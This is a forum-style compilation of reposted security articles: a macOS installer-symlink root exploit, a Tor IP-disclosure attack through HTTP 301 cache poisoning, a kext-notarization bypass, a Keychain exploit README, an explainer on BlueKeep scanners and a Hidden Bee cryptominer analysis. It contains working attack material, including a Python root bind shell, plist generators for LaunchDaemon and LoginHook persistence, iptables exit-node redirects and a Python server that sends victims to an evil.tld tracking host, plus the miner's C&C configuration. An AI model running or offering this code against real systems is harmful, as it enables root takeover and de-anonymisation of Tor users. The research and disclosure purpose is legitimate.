    1. Grab an installer pkg, for example from the AppStore (Downloading installer packages from the Mac App Store with AppStoreExtract | Der Flounder)
    2. Unpack the pkg: pkgutil --expand example.pkg myfolder
    3. Enter the folder, and decompress the embedded Payload (inside the embedded pkg folder): tar xvf embedded.pkg/Payload
    4. Embed your file (it can be anywhere and anything):

      $ mkdir Example.app/Contents/test
      $ echo aaaa > Example.app/Contents/test/a

    5. Recompress the app: find ./Example.app | cpio -o --format odc | gzip -c > Payload
    6. Delete unnecessary files, and move the Payload to the embedded pkg folder.
    7. Repack the pkg: pkgutil --flatten myfolder/ mypackage.pkg

      The package's digital signature will be lost, so you will need a method to bypass Gatekeeper. The embedded app's signature will also be broken, as these days every single file inside an .app bundle must be digitally signed. Typically the main mach-o file is signed, and it holds the hash of the _CodeSignatures plist file, which in turn contains the hashes of all the other files. If you place a new file inside the .app bundle, that will invalidate the signature. However, this is not a problem here: if you can bypass Gatekeeper for the .pkg file, the installed application will not be subject to Gatekeeper's verification.

      Redistributing paid apps

      Using the same tool as in the previous example, we can grab the installer for a given application. If you keep a paid app this way, it will still work somewhere else, even for someone who didn't pay for it. There is no default verification in an application of whether it was purchased or not, and it doesn't contain anything that tracks this. With that, if you buy an application, you can easily distribute it somewhere else. In-app purchases probably won't work, as those are tied to the Apple ID, and if another activation is needed, that could also be a good countermeasure. But apps that don't have these can easily be stolen. Developers should build in some verification of Apple IDs; I'm not sure it's possible, but it would be useful for them.

      Privilege escalation returns on Mojave

      The fix

      This year (2019) I've been talking to a few people about this, and it hit me that I had never checked whether symlinks were completely broken during the installation or not. It turned out that they are still a thing.

      The way the fix works is that installd no longer has access to the crontab folder (/usr/lib/cron/tabs), even running as root, so it won't be able to create files there. I'm not even sure whether this is a direct fix for my POC or some other coincidence. We can find the related error message in /var/log/install.log (you can use the Console app for viewing logs):

      2019-01-31 20:44:49+01 csabymac shove[1057]: [source=file] failed _RelinkFile(/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/401FEDFC-1D7B-4E47-A6E9-E26B83F8988F.activeSandbox/Root/Applications/Crontab Creator.app/Contents/Resources/peter, /private/var/at/tabs/peter): Operation not permitted

    The problem

    The installd process still had access to other folders and could drop files there during the redirection, and those could be abused as well. I tested this, and you could redirect file writes to the following potentially dangerous folders:

    /var/root/Library/Preferences/

    Someone could drop a file called com.apple.loginwindow.plist here, which can contain a LoginHook entry that will be run as root (see the sketch after this list).

    /Library/LaunchDaemons/

    Dropping a plist file here will get its program executed as root (see the sketch after this list).

    /Library/StartupItems/

    Dropping a file here will also execute as root.

    You can also write to /etc.

    Dropping files into these locations is essentially the same idea as dropping a file into the crontab folder. Potentially many other folders are affected as well, so you could craft malicious dylib files, etc., but I didn't explore other options.
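
    To make the first two cases concrete, both plists could be generated with Python's plistlib; a minimal sketch, where the label and the script paths are hypothetical examples in the spirit of this post:

      import plistlib

      # 1) com.apple.loginwindow.plist with a LoginHook entry: once dropped into
      #    /var/root/Library/Preferences/, the hook script runs as root at login.
      loginwindow = {"LoginHook": "/Applications/Scripts/backup-apps.sh"}
      with open("com.apple.loginwindow.plist", "wb") as f:
          plistlib.dump(loginwindow, f)

      # 2) A LaunchDaemon plist: once dropped into /Library/LaunchDaemons/,
      #    launchd starts the program at boot, as root.
      daemon = {
          "Label": "com.example.startup",    # hypothetical label
          "ProgramArguments": ["/Applications/Scripts/sample.sh"],
          "RunAtLoad": True,
      }
      with open("com.example.startup.plist", "wb") as f:
          plistlib.dump(daemon, f)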

    The 2nd POC

    With that, and now being an 'experienced' :D macOS developer, I made a new POC, called StartUp: StartUp on the Mac App Store

    image6

    It is built along the same lines as the previous one, but in this case for LaunchDaemons.

    The way to utilize it is:

    cd /Applications/
    mkdir "StartUp.app"
    cd StartUp.app/
    mkdir Contents
    cd Contents/
    ln -s /Library/LaunchDaemons/ Resources
    cd /Applications/
    mkdir Scripts
    cd Scripts/

    Here you can create a sample.sh script that will run as root after booting up. I put a bind shell into that script; after login, connecting to it gave me a root shell, but it's up to you what you put there.

    #sample.sh
    python /Applications/Scripts/bind.py
    #bind.py
    #!/usr/bin/python2
    """
    Python Bind TCP PTY Shell - testing version
    infodox - insecurety.net (2013)
    Binds a PTY to a TCP port on the host it is ran on.
    """
    import os
    import pty
    import socket
    
    lport = 31337 # XXX: CHANGEME
    
    def main():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('', lport))
        s.listen(1)
        (rem, addr) = s.accept()
        os.dup2(rem.fileno(),0)
        os.dup2(rem.fileno(),1)
        os.dup2(rem.fileno(),2)
        os.putenv("HISTFILE",'/dev/null')
        pty.spawn("/bin/bash")
        s.close()
    	
    if __name__ == "__main__":
        main()
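
    Once launchd has started the script at boot, connecting to TCP port 31337 (the lport value above) with any netcat-style client yields the root shell.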

    Reporting to Apple

    I reported this to Apple around February, and tried to explain again, in great detail, why I think the entire installation process is still broken and could be abused.

    The security enhancement

    Apple never admitted this was a security bug; they never assigned a CVE and considered it an enhancement instead. The fix finally came with Mojave 10.14.5, and they even mentioned my name on their website.

    image7

    I made a quick test, and it turned out that they eventually managed to fix it properly. If you create the app's folder and place files there, those will all be wiped. Using FireEye's Monitor.app, we can actually see it. The first event shows that they move the entire folder.

    image8

    Being in Game Of Thrones mood I imagine it like this:

    image9

    The following event shows that they install the application into its proper location:

    image10

    So you can no longer drop your files there, etc.

    I like the way this got fixed eventually, and I would like to thank Apple for that.

    I would also like to thank Patrick Wardle, who was really helpful whenever I turned to him with my n00b macOS questions.

    To be continued…

    The story goes on, as I bypassed Apple's fix. An update will follow once they fix the issue.

     

    Sursa: https://theevilbit.github.io/posts/getting_root_with_benign_appstore_apps/

  13. Disclosing Tor users' real IP address through 301 HTTP Redirect Cache Poisoning

    Written on May 29, 2019

    This blog post describes a practical application of the 'HTTP 301 Cache Poisoning' attack, which can be used by a malicious Tor exit node to disclose the real IP address of chosen clients.

    PoC Video

    • Client: Chrome Canary (76.0.3796.0)
    • Client real IP address: 5.60.164.177
    • Client tracking parameter: 6b48c94a-cf58-452c-bc50-96bace981b27
    • Tor exit node IP address: 51.38.150.126
    • Transparent Reverse Proxy: tor.modlishka.io (Modlishka - updated code to be released.)

    Note: In this scenario Chrome was configured, through SOCKS5 settings, to use the Tor network. The Tor circuit was set to a particular Tor test exit node: '51.38.150.126'. This is a proof-of-concept, and many things can be further optimized…

    On the malicious Tor exit node, all of the traffic is redirected to the Modlishka proxy:

    iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j DNAT --to-destination ip_address:80
    iptables -A FORWARD -j ACCEPT
    

    Watch the video: https://vimeo.com/339586722

    Example Attack Scenario Description

    Assumptions:

    • Browser-based application (in this case a standard browser) that will connect through the Tor network and, finally, through a malicious Tor exit node.
    • A malicious Tor exit node that intercepts all of the non-TLS HTTP traffic and performs HTTP 301 cache poisoning on it.

    Disclosing Tor client IP address

    Let's consider the following attack scenario steps:

    1. User connects to the Internet through the Tor network, either by setting the browser to use Tor's SOCKS5 proxy or system-wide, where the whole OS traffic is routed through the Tor network.
    2. User begins his typical browsing session with his favorite browser, where usually a lot of non-TLS HTTP traffic is being sent through the Tor tunnel.
    3. Evil Tor exit node intercepts those non-TLS requests and responds to each of them with an HTTP 301 permanent redirect. These redirects will be cached permanently by the browser and will point to a tracking URL with an assigned Tor client identifier. The tracking URL can be created in the following way: http://user-identifier.evil.tld, where 'evil.tld' will collect all source IP information and redirect clients to the originally requested hosts… or, alternatively, to a transparent reverse proxy that will try to intercept all of the client's subsequent HTTP traffic. Furthermore, since it is also possible to carry out automated cache pollution for the most popular domains (as described in the previous post), e.g. the Alexa Top 100, an attacker can maximize his chances of disclosing the real IP address.
    4. User, after closing the Tor session, will switch back to his usual network.
    5. As soon as the user types one of the previously poisoned entries, e.g. "google.com", into the URL address bar, the browser will use the cache and internally redirect to the tracking URL with the exit-node context identifier.
    6. The exit node will now be able to correlate previously intercepted HTTP requests with the user's real IP address, through the information gathered on the external host behind the tracking URL with the user identifier. The evil.tld host will have information about all of the IP addresses that were used to access that tracking URL.

    Obviously, this gives the Tor exit node the possibility to effectively correlate chosen HTTP requests with the client's IP address: the previously generated tracking URL will be requested by the client twice, first through the Tor tunnel and, because of the poisoned cache entries, again later after connecting through a standard ISP connection.
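
    To make the mechanics concrete, here is a minimal sketch in Python of the poisoning response such an exit node could generate for every intercepted plaintext request (the tracking id is the one from the PoC above, and evil.tld is the placeholder collection domain):

      from http.server import BaseHTTPRequestHandler, HTTPServer

      USER_ID = "6b48c94a-cf58-452c-bc50-96bace981b27"  # per-client tracking parameter

      class Poison301(BaseHTTPRequestHandler):
          def do_GET(self):
              orig_host = self.headers.get("Host", "")
              # A 301 is cached permanently by the browser for this host,
              # so later visits outside Tor also hit the tracking URL.
              self.send_response(301)
              self.send_header("Location",
                               "http://%s.evil.tld/?orig=%s" % (USER_ID, orig_host))
              self.end_headers()

      if __name__ == "__main__":
          HTTPServer(("0.0.0.0", 80), Poison301).serve_forever()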

    Another approach might rely on injecting modified JavaScript with embedded tracking URLs into the relevant non-TLS responses, with appropriate cache control headers set (e.g. 'Cache-Control: max-age=31536000'). However, this approach wouldn't be very effective.

    Tracking users through standard cookies set by different web applications is also possible, but it's not easy to force the client to visit the same attacker-controlled domain twice: once while connecting through the Tor exit node, and later after switching back to the standard ISP connection.

    Conclusions

    The fact that it is possible to achieve a certain persistency in the browser's cache by injecting poisoned entries can be abused by an attacker to disclose the real IP address of Tor users who send non-TLS HTTP traffic through malicious exit nodes. Furthermore, poisoning a significant number of popular domain names will increase the likelihood of receiving a callback HTTP request (with the assigned user identifier) that discloses the user's real IP. An attempt can also be made to 'domain hook' some of the browser-based clients, hoping that a mistyped domain name will not be noticed by the user or will not be displayed (e.g. mobile application WebViews).

    Possible mitigation:

    • When connecting through the Tor network, ensure that all non-TLS traffic is disabled. Example browser plugins that can be used: "Firefox", "Chrome".
    • Additionally, always use the browser's 'private' mode for browsing through Tor.
    • Do not route all of your OS traffic through Tor without ensuring that it is TLS traffic only…
    • Use the latest version of the Tor browser whenever possible for browsing web pages.


    Sursa: https://blog.duszynski.eu/tor-ip-disclosure-through-http-301-cache-poisoning/

  14. How to bypass Mojave 10.14.5’s new kext security

    vboxkext02.jpg?w=683

    I fear that with the onset of notarization, this scenario is going to become increasingly common: you've just tried to install software which you understand includes at least one kernel extension, and which has worked fine before macOS 10.14.5 (which you're running). The install fails for no apparent reason. What do you do next?

    vboxkext02

    The probable cause is that one or more of the kernel extensions haven’t been notarized, and the security system in macOS has taken exception to that, refusing to install them. Of course there are a thousand and one other possible reasons, but here I’ll assume it’s the result of this change in security. Check first to ensure that you’re not overlooking the normal security dialog, which invites you to open the Security & Privacy pane and agree to the extensions being installed there.

    vboxkext03

    The only piece of information that you require is the developer ID of those kernel extensions. The simplest way to obtain this now is to open the Installer package using Suspicious Package.

    kextinstall10

    There, locate one of the kernel extensions, open the contextual menu, and export that whole kext (the folder with the extension .kext) to your Downloads folder.

    To get the developer ID and check whether that extension has been notarized in one fell swoop, use the spctl command in the form
    spctl -a -vv -t install mykext.kext
    One easy way to do this is to type most of the command
    spctl -a -vv -t install
    then drag and drop the extension from your Downloads folder to the end of that line, where its path and name should appear, e.g.
    /Users/hoakley/Downloads/VBoxDrv.kext

    Then press Return, and you should see three lines of response:
    mykext.kext: accepted
    source=Developer ID
    origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)

    If the extension is notarized already, they will instead look like
    mykext.kext: accepted
    source=Notarized Developer ID
    origin=Developer ID Application: DeveloperName (NJ2ABCUVC1)

    Make a note on paper or your iOS device of the developer ID provided in parentheses, as you’ll need those in a few moments.

    Close your apps down and restart your Mac in Recovery mode. There, open Terminal and type in the command
    /usr/sbin/spctl kext-consent add NJ2ABCUVC1
    where the code at the end is exactly the same as the developer ID which you just obtained from spctl. Press Return, wait for the command prompt to appear again, then quit Terminal and restart in normal mode.

    Now when you try running the Installer package, you should find that its extensions install correctly, as you’ve bypassed the new kext security controls.

    Please let the developer know about your problems and this workaround: they need to get their kernel extensions notarized to spare other users this same rigmarole.

    New spctl features and wrinkles

    The man page for spctl hasn’t been updated for over six years, but in 2017 it gained a set of actions to handle kernel extensions and your consent for them to be installed – what Apple terms User Approved or Secure Kernel Extension loading. You should be able to see these if you call spctl with the -h option. These kext-consent commands only work when you’re booted in Recovery mode: they should return errors if you’re running in regular mode.

    This appears to unblock kernel extensions which macOS won’t install because they don’t comply with the new rules on notarization, presumably by adding the kernel extension to the new whitelist which was installed as part of the macOS 10.14.5 update. Kernel extensions which are correctly notarized should result in the display of the consent dialog taking the user to Security & Privacy; those which aren’t and don’t appear in the whitelist are simply blocked and not installed now.

    To show whether the normal system for obtaining user consent to install extensions is enabled:
    spctl kext-consent status

    To enable the normal system for obtaining user consent:
    spctl kext-consent enable
    and disable to disable, of course.

    To list the developer IDs which are allowed to load extensions without user consent
    spctl kext-consent list

    To add a developer ID to the list of those allowed to load kernel extensions without user consent
    spctl kext-consent add [devID]
    as used above, and remove to remove that.

    It is strange that this control using kext-consent works at a developer ID level, thus applies to all kernel extensions from that developer, whereas notarization is specific to an individual release of a certain code bundle from that developer.

     

    Sursa: https://eclecticlight.co/2019/06/01/how-to-bypass-mojave-10-14-5s-new-kext-security/

  15. KeySteal

    KeySteal is a macOS <= 10.13.3 Keychain exploit that allows you to access passwords inside the Keychain without a user prompt.
    KeySteal consists of two parts:

    1. KeySteal Daemon: This is a daemon that exploits securityd to get a session that is allowed to access the Keychain without a password prompt.
    2. KeySteal Client: This is a library that can be injected into Apps. It will automatically apply a patch that forces the Security Framework to use the session of our keysteal daemon.

    Building and Running

    1. Open the KeySteal Xcode Project
    2. Build the keystealDaemon and keystealClient
    3. Open the directory which contains the built daemon and client (right click on keystealDaemon -> Open in Finder)
    4. Run dump-keychain.sh

    TODO

    Add a link to my talk about this vulnerability at Objective by the Sea

    License

    For most files, see LICENSE.txt.
    The following files were taken (or generated) from Security-58286.220.15 and are under the Apple Public Source License:

    • handletypes.h
    • ss_types.h
    • ucsp_types.h
    • ucsp.hpp
    • ucspUser.cpp

    A copy of the Apple Public Source License can be found here.

     

    Sursa: https://github.com/LinusHenze/Keysteal

  16.  

    By its nature, networking code is both complex and security critical. Any data received from the network is potentially malicious and therefore needs to be handled extremely carefully. However, the multitude of different networking protocols, such as IP, IPv6, TCP, and UDP, inevitably make the networking code very complicated, thereby making it more difficult to ensure that the code is bug free. For example, many of the functions in Apple’s networking code are thousands of lines long, with a huge number of different control flow paths to handle all the possible flags and options.

    Over the course of 2018, I found and reported a number of RCE vulnerabilities in iOS and macOS, all related to mbuf processing in Apple’s XNU operating system kernel: CVE-2018-4249, -4259, -4286, -4287, -4288, -4291, -4407, -4460. The mbuf datatype is used by the networking code in XNU to store and process all incoming and outgoing network packets.

    In this talk I will explain some of the low level details of how network packets are structured, and how the mbuf datatype is used to process them in XNU. I will discuss some of the corner cases that were handled incorrectly in XNU, making the code vulnerable to remote attack. I will also talk about how I discovered each vulnerability using custom-written variant analysis with Semmle QL (http://github.com/Semmle/QL), a research technique that complements other bug-finding techniques such as fuzzing. To finish off, I will explain the C programming techniques that I used to implement PoC exploits for each of these vulnerabilities, with demonstrations of these exploits in action (crashing the kernel).

  17. Friday, May 31, 2019

    Avoiding the DoS: How BlueKeep Scanners Work

     

    Background 

    On May 21, @JaGoTu and I released a proof-of-concept on GitHub for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep".

    Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.

    msfscanner.PNG

    Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

    RDP Channel Internals 

    The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol.

    The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages.

    There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver.

    That should be enough information to follow the rest of this post. More background information is available from ZDI.

    MS_T120 I/O Completion Packets 

    After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind.

    The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.

    iothreadfunc.PNG

    Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

    MS_T120 Port Data Dispatch 

    On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:

    mcsportdata.png

    We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

    • 0x0 - rdpwsx!HandleConnectProviderIndication
    • 0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

    If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.

    Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.

    Patch Detection 

    I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed:

    handledisconnectproviderindication.PNG

    It's really simple: If you send an MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper cleanup. There should be no risk of denial-of-service.

    The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

    Vulnerable Host Behavior 

    On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to cleanup and close the MS_T120 channel. The server then sends a MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away.

    And of course, with an invalid size, you RCE/BSoD.

    Patched Host Behavior 

    However, on a patched host, sending the MS_T120 channel message in the first place is a NOP: with the patch, you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice.

    In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.
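
    In outline, the final decision step looks like this (a sketch only: the RDP handshake, channel binding, and the 0x2 message itself are omitted, and the helper name is hypothetical):

      import socket

      def classify_host(sock):
          # Assumes the handshake is done and a valid-size MS_T120
          # Disconnect Provider (0x2) message has already been sent.
          sock.settimeout(5.0)  # the PoC waits 5 seconds
          try:
              sock.recv(4096)
          except socket.timeout:
              return "patched"  # the 0x2 message was a NOP: no disconnect notice
          # Data received here should be the MCS Disconnect Provider Ultimatum
          # PDU, meaning MS_T120 was bound and cleaned up: host is unpatched.
          return "vulnerable"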

    CPU Architecture Differences 

    Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes on the two architectures, so one might think that sending both at once would cause the denial-of-service.

    originalrdp.PNG

    Simply put, besides the sizes being different, the message opcode is at a different offset. So on the opposite architecture, with a zeroed-out packet (besides the opcode), the server will think you are trying to perform the Connect (0x0) message. The Connect 0x0 message requires a much larger message, and other miscellaneous checks have to pass before it proceeds. The message meant for the other architecture will simply be ignored.

    This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used.

    Conclusion 

    This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch; however, it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat itself, and people will use this tool before a crisis.

    Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet.

    To my knowledge, the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I did, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related to the vulnerability, it does not contain useful information for producing an RCE exploit beyond what is already widely known.

     
  18. Hidden Bee: Let’s go down the rabbit hole

    Posted: May 31, 2019 by hasherezade 
    Last updated: June 1, 2019

    Some time ago, we discussed an interesting piece of malware, Hidden Bee. It is a Chinese miner composed of userland components as well as a bootkit part. One of its unique features is a custom format used for some of the high-level elements (this format was featured in my recent presentation at SAS).

    Recently, we stumbled upon a new sample of Hidden Bee. As it turns out, its authors decided to redesign some elements, as well as the formats used. In this post, we will take a deep dive into the functionality of the loader and the changes it introduces.

    Sample

    831d0b55ebeb5e9ae19732e18041aa54 – shared by @James_inthe_box

    Overview

    Hidden Bee runs silently: only increased processor usage can hint that the system is infected. More can be revealed with the help of tools inspecting the memory of running processes.

    Initially, the main sample installs itself as a Windows service:

    added_service.png Hidden Bee service

    However, once the next component is downloaded, this service is removed.

    The payloads are injected into several applications, such as svchost.exe, msdtc.exe, dllhost.exe, and WmiPrvSE.exe.

    injected2.png

    If we scan the system with hollows_hunter, we can see that there are some implants in the memory of those processes:

    scanned_list.png Results of the scan by hollows_hunter

    Indeed, if we take a look inside each process’ memory (with the help of Process Hacker), we can see atypical executable elements:

    malware_modules_implanted.png Hidden Bee implants are placed in RWX memory

    Some of them are lacking typical PE headers, for example:

    malware_module1.png Executable in one of the multiple customized formats used by Hidden Bee

    But in addition to this, we can also find PE files implanted at unusual addresses in the memory:

    pe_files_injected.png Manually-loaded PE files in the memory of WmiPrvSE.exe

    Those manually-loaded PE files turned out to be legitimate DLLs: OpenCL.dll and cudart32_80.dll (NVIDIA CUDA Runtime, version 8.0.61). CUDA is a technology belonging to NVIDIA graphics cards, so their presence suggests that the malware uses the GPU to boost its mining performance.

    When we inspect the memory even closer, we see within the executable implants there are some strings referencing LUA components:

    lua_references-1.png Strings referencing LUA scripting language, used by Hidden Bee components

    Those strings are typical for the Hidden Bee miner, and they were also mentioned in the previous reports.

    We can also see the strings referencing the mining activity, i.e. the Cryptonight miner.

    list.png

    List of modules:

    bin/i386/coredll.bin
    dispatcher.lua
    bin/i386/ocl_detect.bin
    bin/i386/cuda_detect.bin
    bin/amd64/coredll.bin
    bin/amd64/algo_cn_ocl.bin
    lib/amd64/cudart64_80.dll
    src/cryptonight.cl
    src/cryptonight_r.cl
    bin/i386/algo_cn_ocl.bin
    config.lua
    lib/i386/cudart32_80.dll
    src/CryptonightR.cu
    bin/i386/algo_cn.bin
    bin/amd64/precomp.bin
    bin/amd64/ocl_detect.bin
    bin/amd64/cuda_detect.bin
    lib/amd64/opencl.dll
    lib/i386/opencl.dll
    bin/amd64/algo_cn.bin
    bin/i386/precomp.bin

    And we can even retrieve the miner configuration:

      configuration.set("stratum.connect.timeout",20)
      configuration.set("stratum.login.timeout",60)
      configuration.set("stratum.keepalive.timeout",240)
      configuration.set("stratum.stream.timeout",360)
      configuration.set("stratum.keepalive",true)
      configuration.set("job.idle.count",30)
      configuration.set("stratum.lock.count",30)
      configuration.set("miner.protocol","stratum+ssl://r.twotouchauthentication.online:17555/")
      configuration.set("miner.username",configuration.uuid())
      configuration.set("miner.password","x")
      configuration.set("miner.agent","MinGate/5.1")

    Inside

    Hidden Bee has a long chain of components that finally lead to loading the miner. Along the way, we will find a variety of customized formats: data packages, executables, and filesystems. The filesystems are mounted in the memory of the malware, and additional plugins and configuration are retrieved from there. Hidden Bee communicates with the C&C to retrieve the modules, along the way also using its own TCP-based protocol.

    The first part of the loading process is described by the following diagram:

    hidden_bee_loader-2.png

    Each of the .spk packages contains a custom ‘SPUTNIK’ filesystem, containing more executable modules.

    bee_plugins-1.png

    Starting the analysis from the loader, we will go down to the plugins, showing the inner workings of each element taking part in the loading process.

    The loader

    In contrast to most of the malware that we see nowadays, the loader is not packed with any crypter. According to the header, it was compiled in November 2018.

    compile_time.png

    While in the former edition the modules in the custom formats were dropped as separate files, this time the next stage is unpacked from inside the loader.

    The loader is not obfuscated. Once we load it with typical tools (IDA), we can clearly see how the new format is loaded.

    to_load_custom.png The loading function

    Section .shared contains the configuration:

    section_shared.png Encrypted configuration. The last 16 bytes after the data block are the key.

    The configuration is decrypted with the help of the XTEA algorithm.

    decrypt_config.png Decrypting the configuration

    The decrypted configuration must start with the magic WORD "pZ". It contains the C&C and the name under which the service will be installed:

    decrypted_config.png
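
    For reference, standard XTEA block decryption looks like the following sketch in Python (the 16-byte key is the one stored after the data block; the block mode and endianness here are assumptions for illustration):

      import struct

      def xtea_decrypt_block(v0, v1, key, rounds=32):
          # Standard XTEA decipher for one 64-bit block; key is four 32-bit words.
          delta = 0x9E3779B9
          s = (delta * rounds) & 0xFFFFFFFF
          for _ in range(rounds):
              v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & 0xFFFFFFFF
              s = (s - delta) & 0xFFFFFFFF
              v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & 0xFFFFFFFF
          return v0, v1

      def xtea_decrypt(data, key16):
          key = struct.unpack("<4I", key16)
          out = bytearray()
          for off in range(0, len(data) - len(data) % 8, 8):
              block = struct.unpack_from("<2I", data, off)
              out += struct.pack("<2I", *xtea_decrypt_block(block[0], block[1], key))
          return bytes(out)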

    Unscrambling the NE format

    The NE format was seen before, in former editions of Hidden Bee. It is just a scrambled version of the PE. By observing which fields have been misplaced, we can easily reconstruct the original PE.

    unpack_from_loader.png The loader, unpacking the next stage

    NE is one of two similar formats used by this malware. Another one starts with the DWORD 0x0EF1FAB9 and is used further in the loading of components. Both of them have an analogous structure that comes from a slightly modified PE format:

    reconstruct_pe-1.png

    Header:

    WORD magic; // 'NE'
    WORD pe_offset;
    WORD machine_id; 

    The conversion back to the PE format is trivial: It is enough to add the erased magic numbers, MZ and PE, and to move the displaced fields back to their original offsets. A tool that automatically does this conversion is available here.
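
    A sketch of this repair in Python, following the three-field header above (treating everything else in the header as already in place is an assumption):

      import struct

      def ne_to_pe(data):
          buf = bytearray(data)
          magic, pe_offset, machine = struct.unpack_from("<HHH", buf, 0)
          assert magic == 0x454E                        # 'NE'
          buf[0:2] = b"MZ"                              # restore the DOS magic
          struct.pack_into("<I", buf, 0x3C, pe_offset)  # restore e_lfanew
          buf[pe_offset:pe_offset + 4] = b"PE\x00\x00"  # restore the PE signature
          struct.pack_into("<H", buf, pe_offset + 4, machine)
          return bytes(buf)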

    In the previous edition, the parts of Hidden Bee with analogical functionality were delivered in a different, more complex proprietary format than the one currently being analyzed.

    Second stage: a downloader (in NE format)

    As a result of the conversion, we get the following PE (fddfd292eaf33a490224ebe5371d3275). This module is a downloader of the next stage. The interesting thing is that the subsystem of this module is set to a driver; however, it is not loaded like a typical driver. The custom loader loads it into user space just like any typical userland component.

    The function at the module’s Entry Point is called with three parameters. The first is a path of the main module. Then, the parameters from the configuration are passed. Example:

     

    0012FE9C     00601A34  UNICODE "\"C:\Users\tester\Desktop\new_bee.exe\""
    0012FEA0     00407104  UNICODE "NAPCUYWKOxywEgrO"
    0012FEA4     00407004  UNICODE "118.41.45.124:9000"

     

    call_module_ep.png Calling the Entry Point of the manually-loaded NE module

    The execution of the module can take one of the two paths. The first one is meant for adding persistence: The module installs itself as a service.

    If the module detects that it is already running as a service, it takes the second path. In that case, it proceeds to download the next module from the server. The next module is packed as a Cabinet file.

    to_unpack_cabinet.png The downloaded Cabinet file is being passed to the unpacking function

    It is first unpacked into a file named "core.sdb". The unpacked module is in a customized format based on PE. This time, the format has a different signature, "NS", distinct from the aforementioned "NE" format (a detailed explanation is given further on).

    unpacked_NS_file-600x227.png

    It is loaded by the proprietary loader.

    check_ns_sign.png

    The loader enumerates all the executables in the directory %Systemroot%\Microsoft.NET\ and selects the ones with compatible bitness (in the analyzed case, it was selecting 32-bit PEs). Once it finds a suitable PE, it runs it and injects the payload there. The injected code is run by adding its entry point to the APC queue.

    created_process.png Hidden Bee component injecting the next stage (core.sdb) into a new process

    In case it failed to find the suitable executable in that directory, it performs the injection into dllhost.exe instead.

    Unscrambling the NS format

    As mentioned before, core.sdb is in yet another format, named NS. It is also a customized PE; however, this time the conversion is more complex than for the NE format, because more structures are customized. It looks like the next step in the evolution of the NE format.

    core_sdb.png Header of the NS format

    We can see that the changes to the PE headers are bigger and more lossy: only minimal information is maintained. Only a few Data Directories are left. The section table is also shrunk: Each section header contains only four out of the nine fields present in the original PE.

    Additionally, the format allows passing a runtime argument from the loader to the payload via the header: The pointer is saved into an additional field (marked "Filled Data" in the picture).

    Not only is the PE header shrunk. Similar customization is done on the Import Table:

    custom_import_table1.png Customized part of the NS format’s import table

    This custom format can also be converted back to the PE format with the help of a dedicated converter, available here.

    Third stage: core.sdb

    The core.sdb module converted to PE format is available here: a17645fac4bcb5253f36a654ea369bf9.

    The interesting part is that the external loader does not complete the full loading process of the module; it only copies the sections. The rest of the module loading, such as applying relocations and filling imports, is done internally by core.sdb.

    coresdb_at_ep_.png The loading function is just at the Entry Point of core.sdb

    The previous component was supposed to pass core.sdb an additional buffer with data about the installed service: the name and the path. During its execution, core.sdb will look this data up. If found, it will delete the previously-created service, along with the initial file that started the infection:

    removing_the_service.png Removing the initial service

    Getting rid of the previous persistence method suggests that it will be replaced by some different technique. Knowing previous editions of Hidden Bee, we can suspect that it may be a bootkit.

    After locking a mutex in the format Global\SC_{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, the module proceeds to download another component. But before the download, a few things are checked first.

    can_continue.png Checks done before download of the next module

    First of all, there is a defensive check for whether any known debuggers or sniffers are running. If so, the function quits.

    blacklisted_names.png The blacklist

    Also, there is a check if the application can open a file ‘\??\NPF-{0179AC45-C226-48e3-A205-DCA79C824051}’.

    If all the checks pass, the function proceeds and queries the following URL, where GET variables contain the system fingerprint:

